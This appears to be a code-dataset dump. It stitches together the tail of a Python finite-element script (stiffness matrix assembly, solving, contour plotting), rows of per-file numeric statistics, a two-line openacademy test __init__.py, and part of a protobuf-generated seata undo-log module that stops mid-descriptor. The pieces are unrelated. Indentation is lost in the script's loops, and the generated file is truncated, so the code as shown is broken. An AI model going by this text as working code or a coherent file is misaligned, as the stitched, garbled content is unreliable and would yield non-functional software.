k0[i4*dof+3, i4*dof+3] += (Ac2*Ac2)*(c2*c2)*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(16*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+3, i4*dof+4] += (Ac2*Ac2)*c2*d2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(16*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+4, i1*dof+2] += Ac2*d2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b2 - E55*a2)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+4, i1*dof+3] += -Ac2*d2*(Ac1 + Ac2)*(E44*b2 - E45*a2)/(8*(Ac*Ac)*Ae2)
k0[i4*dof+4, i1*dof+4] += -Ac2*d2*(Ac1 + Ac2)*(E45*b2 - E55*a2)/(8*(Ac*Ac)*Ae2)
k0[i4*dof+4, i2*dof+2] += Ac2*d2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+4, i2*dof+3] += Ac2*d2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+4, i2*dof+4] += Ac2*d2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+4, i3*dof+2] += Ac1*Ac2*d2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+4, i3*dof+3] += Ac1*Ac2*c1*d2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+4, i3*dof+4] += Ac1*Ac2*d1*d2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+4, i4*dof+2] += (Ac2*Ac2)*d2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(8*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+4, i4*dof+3] += (Ac2*Ac2)*c2*d2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(16*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+4, i4*dof+4] += (Ac2*Ac2)*(d2*d2)*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(16*(Ac*Ac)*(Ae2*Ae2))
print('Atotal:', Atotal)
puvw = 2
# force vector
fext = np.zeros(n*dof, dtype=np.float64)
fext[nodes[3].index*dof + puvw] = 500.
fext[nodes[7].index*dof + puvw] = 1000.
fext[nodes[11].index*dof + puvw] = 1000.
fext[nodes[15].index*dof + puvw] = 500.
#k0[i<j] = k0[i>j]
i, j = np.indices(k0.shape)
print('is_symmetric:', np.allclose(k0[i>j], k0[i<j]))
print('is_symmetric:', k0[i>j].sum(), k0[i<j].sum())
test = is_symmetric(coo_matrix(k0))
print('is_symmetric:', test)
# boundary conditions
for i in [0, 4, 8, 12]:
for j in [0, 1, 2]:
k0[nodes[i].index*dof+j, :] = 0
k0[:, nodes[i].index*dof+j] = 0
k0 = coo_matrix(k0)
u = solve(k0, fext, silent=True)
xcord = np.array([node.pos[0] for node in nodes])
ycord = np.array([node.pos[1] for node in nodes])
wmin = u[puvw::dof].min()
wmax = u[puvw::dof].max()
levels = np.linspace(wmin, wmax, 400)
print(u[puvw::dof].reshape(4, 4))
plt.contourf(xcord.reshape(4, 4), ycord.reshape(4, 4), u[puvw::dof].reshape(4, 4),
levels=levels)
plt.savefig('plot_edge_based_smoothing_domain.png', bbox_inches='tight')
| 138.923844
| 414
| 0.586238
| 32,338
| 153,233
| 2.769002
| 0.01339
| 0.051461
| 0.068614
| 0.02573
| 0.927175
| 0.921636
| 0.916376
| 0.908961
| 0.899435
| 0.890668
| 0
| 0.267944
| 0.147494
| 153,233
| 1,102
| 415
| 139.049909
| 0.417524
| 0.013541
| 0
| 0.085805
| 0
| 0
| 0.001476
| 0.000238
| 0
| 0
| 0
| 0.000907
| 0
| 1
| 0.013771
| false
| 0.001059
| 0.005297
| 0.003178
| 0.036017
| 0.005297
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
95633be6a046a2ae5e44ff7382d7b3f5e948374c
| 91
|
py
|
Python
|
openacademy/tests/__init__.py
|
mapuerta/openacademy-proyect
|
31c7f48f735eb64bd4908ef5194977b05f04383c
|
[
"Apache-2.0"
] | null | null | null |
openacademy/tests/__init__.py
|
mapuerta/openacademy-proyect
|
31c7f48f735eb64bd4908ef5194977b05f04383c
|
[
"Apache-2.0"
] | null | null | null |
openacademy/tests/__init__.py
|
mapuerta/openacademy-proyect
|
31c7f48f735eb64bd4908ef5194977b05f04383c
|
[
"Apache-2.0"
] | null | null | null |
from . import test_global_openacademy_course
from . import test_global_openacademy_session
| 30.333333
| 45
| 0.89011
| 12
| 91
| 6.25
| 0.583333
| 0.266667
| 0.373333
| 0.533333
| 0.826667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087912
| 91
| 2
| 46
| 45.5
| 0.903614
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
c2f042c7028cbf4784b5d817a5010de3b0fea9ab
| 36,133
|
py
|
Python
|
seata/rm/datasource/undo/parser/proto/branch_undolog_pb2.py
|
opentrx/seata-python
|
66fb3382217a43effa3d1bc5ec2b62204d499dba
|
[
"Apache-2.0"
] | 8
|
2021-09-09T06:28:08.000Z
|
2022-03-06T04:58:40.000Z
|
seata/rm/datasource/undo/parser/proto/branch_undolog_pb2.py
|
opentrx/seata-python
|
66fb3382217a43effa3d1bc5ec2b62204d499dba
|
[
"Apache-2.0"
] | null | null | null |
seata/rm/datasource/undo/parser/proto/branch_undolog_pb2.py
|
opentrx/seata-python
|
66fb3382217a43effa3d1bc5ec2b62204d499dba
|
[
"Apache-2.0"
] | 4
|
2021-08-23T07:44:27.000Z
|
2022-02-11T08:42:54.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: branch_undolog.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import any_pb2 as google_dot_protobuf_dot_any__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='branch_undolog.proto',
package='seata.rm.datasource.undo.parser.proto',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x14\x62ranch_undolog.proto\x12%seata.rm.datasource.undo.parser.proto\x1a\x19google/protobuf/any.proto\"\x99\x01\n\rBranchUndoLog\x12\x10\n\x03xid\x18\x01 \x01(\tH\x00\x88\x01\x01\x12\x16\n\tbranch_id\x18\x02 \x01(\x03H\x01\x88\x01\x01\x12H\n\rsql_undo_logs\x18\x03 \x03(\x0b\x32\x31.seata.rm.datasource.undo.parser.proto.SQLUndoLogB\x06\n\x04_xidB\x0c\n\n_branch_id\"\xc7\x01\n\nSQLUndoLog\x12\x10\n\x08sql_type\x18\x01 \x01(\x05\x12\x12\n\ntable_name\x18\x02 \x01(\t\x12I\n\x0c\x62\x65\x66ore_image\x18\x03 \x01(\x0b\x32\x33.seata.rm.datasource.undo.parser.proto.TableRecords\x12H\n\x0b\x61\x66ter_image\x18\x04 \x01(\x0b\x32\x33.seata.rm.datasource.undo.parser.proto.TableRecords\"\xa2\x01\n\x0cTableRecords\x12\x44\n\ntable_meta\x18\x01 \x01(\x0b\x32\x30.seata.rm.datasource.undo.parser.proto.TableMeta\x12\x12\n\ntable_name\x18\x02 \x01(\t\x12\x38\n\x04rows\x18\x03 \x03(\x0b\x32*.seata.rm.datasource.undo.parser.proto.Row\"\x95\x03\n\tTableMeta\x12\x12\n\ntable_name\x18\x01 \x01(\t\x12U\n\x0b\x61ll_columns\x18\x02 \x03(\x0b\x32@.seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry\x12S\n\nall_indexs\x18\x03 \x03(\x0b\x32?.seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry\x1a\x64\n\x0f\x41llColumnsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12@\n\x05value\x18\x02 \x01(\x0b\x32\x31.seata.rm.datasource.undo.parser.proto.ColumnMeta:\x02\x38\x01\x1a\x62\n\x0e\x41llIndexsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12?\n\x05value\x18\x02 \x01(\x0b\x32\x30.seata.rm.datasource.undo.parser.proto.IndexMeta:\x02\x38\x01\"\xb6\x03\n\nColumnMeta\x12\x11\n\ttable_cat\x18\x01 \x01(\t\x12\x19\n\x11table_schema_name\x18\x02 \x01(\t\x12\x12\n\ntable_name\x18\x03 \x01(\t\x12\x13\n\x0b\x63olumn_name\x18\x04 \x01(\t\x12\x11\n\tdata_type\x18\x05 \x01(\x05\x12\x16\n\x0e\x64\x61ta_type_name\x18\x06 \x01(\t\x12\x13\n\x0b\x63olumn_size\x18\x07 \x01(\x05\x12\x16\n\x0e\x64\x65\x63imal_digits\x18\x08 \x01(\x05\x12\x16\n\x0enum_prec_radix\x18\t \x01(\x05\x12\x11\n\tnull_able\x18\n \x01(\x05\x12\x0f\n\x07remarks\x18\x0b \x01(\t\x12\x12\n\ncolumn_def\x18\x0c \x01(\t\x12\x15\n\rsql_data_type\x18\r \x01(\x05\x12\x18\n\x10sql_datetime_sub\x18\x0e \x01(\x05\x12/\n\x11\x63har_octet_length\x18\x0f \x01(\x0b\x32\x14.google.protobuf.Any\x12\x18\n\x10ordinal_position\x18\x10 \x01(\x05\x12\x13\n\x0bis_nullable\x18\x11 \x01(\t\x12\x18\n\x10is_autoincrement\x18\x12 \x01(\t\"\xf5\x01\n\tIndexMeta\x12\x41\n\x06values\x18\x01 \x03(\x0b\x32\x31.seata.rm.datasource.undo.parser.proto.ColumnMeta\x12\x12\n\nnon_unique\x18\x02 \x01(\x08\x12\x17\n\x0findex_qualifier\x18\x03 \x01(\t\x12\x12\n\nindex_name\x18\x04 \x01(\t\x12\x0c\n\x04type\x18\x05 \x01(\x05\x12\x12\n\nindex_type\x18\x06 \x01(\x05\x12\x13\n\x0b\x61sc_or_desc\x18\x07 \x01(\t\x12\x13\n\x0b\x63\x61rdinality\x18\x08 \x01(\x05\x12\x18\n\x10ordinal_position\x18\t \x01(\x05\"C\n\x03Row\x12<\n\x06\x66ields\x18\x01 \x03(\x0b\x32,.seata.rm.datasource.undo.parser.proto.Field\"D\n\x05\x46ield\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x10\n\x08key_type\x18\x02 \x01(\x05\x12\x0c\n\x04type\x18\x03 \x01(\x05\x12\r\n\x05value\x18\x04 \x01(\tb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_any__pb2.DESCRIPTOR,])
_BRANCHUNDOLOG = _descriptor.Descriptor(
name='BranchUndoLog',
full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='xid', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog.xid', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='branch_id', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog.branch_id', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sql_undo_logs', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog.sql_undo_logs', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='_xid', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog._xid',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_branch_id', full_name='seata.rm.datasource.undo.parser.proto.BranchUndoLog._branch_id',
index=1, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=91,
serialized_end=244,
)
_SQLUNDOLOG = _descriptor.Descriptor(
name='SQLUndoLog',
full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='sql_type', full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog.sql_type', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='table_name', full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog.table_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='before_image', full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog.before_image', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='after_image', full_name='seata.rm.datasource.undo.parser.proto.SQLUndoLog.after_image', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=247,
serialized_end=446,
)
_TABLERECORDS = _descriptor.Descriptor(
name='TableRecords',
full_name='seata.rm.datasource.undo.parser.proto.TableRecords',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='table_meta', full_name='seata.rm.datasource.undo.parser.proto.TableRecords.table_meta', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='table_name', full_name='seata.rm.datasource.undo.parser.proto.TableRecords.table_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rows', full_name='seata.rm.datasource.undo.parser.proto.TableRecords.rows', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=449,
serialized_end=611,
)
_TABLEMETA_ALLCOLUMNSENTRY = _descriptor.Descriptor(
name='AllColumnsEntry',
full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=819,
serialized_end=919,
)
_TABLEMETA_ALLINDEXSENTRY = _descriptor.Descriptor(
name='AllIndexsEntry',
full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=921,
serialized_end=1019,
)
_TABLEMETA = _descriptor.Descriptor(
name='TableMeta',
full_name='seata.rm.datasource.undo.parser.proto.TableMeta',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='table_name', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.table_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='all_columns', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.all_columns', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='all_indexs', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.all_indexs', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TABLEMETA_ALLCOLUMNSENTRY, _TABLEMETA_ALLINDEXSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=614,
serialized_end=1019,
)
_COLUMNMETA = _descriptor.Descriptor(
name='ColumnMeta',
full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='table_cat', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.table_cat', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='table_schema_name', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.table_schema_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='table_name', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.table_name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='column_name', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.column_name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data_type', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.data_type', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data_type_name', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.data_type_name', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='column_size', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.column_size', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='decimal_digits', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.decimal_digits', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='num_prec_radix', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.num_prec_radix', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='null_able', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.null_able', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='remarks', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.remarks', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='column_def', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.column_def', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sql_data_type', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.sql_data_type', index=12,
number=13, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sql_datetime_sub', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.sql_datetime_sub', index=13,
number=14, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='char_octet_length', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.char_octet_length', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ordinal_position', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.ordinal_position', index=15,
number=16, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_nullable', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.is_nullable', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_autoincrement', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.is_autoincrement', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1022,
serialized_end=1460,
)
_INDEXMETA = _descriptor.Descriptor(
name='IndexMeta',
full_name='seata.rm.datasource.undo.parser.proto.IndexMeta',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='values', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.values', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='non_unique', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.non_unique', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='index_qualifier', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.index_qualifier', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='index_name', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.index_name', index=3,
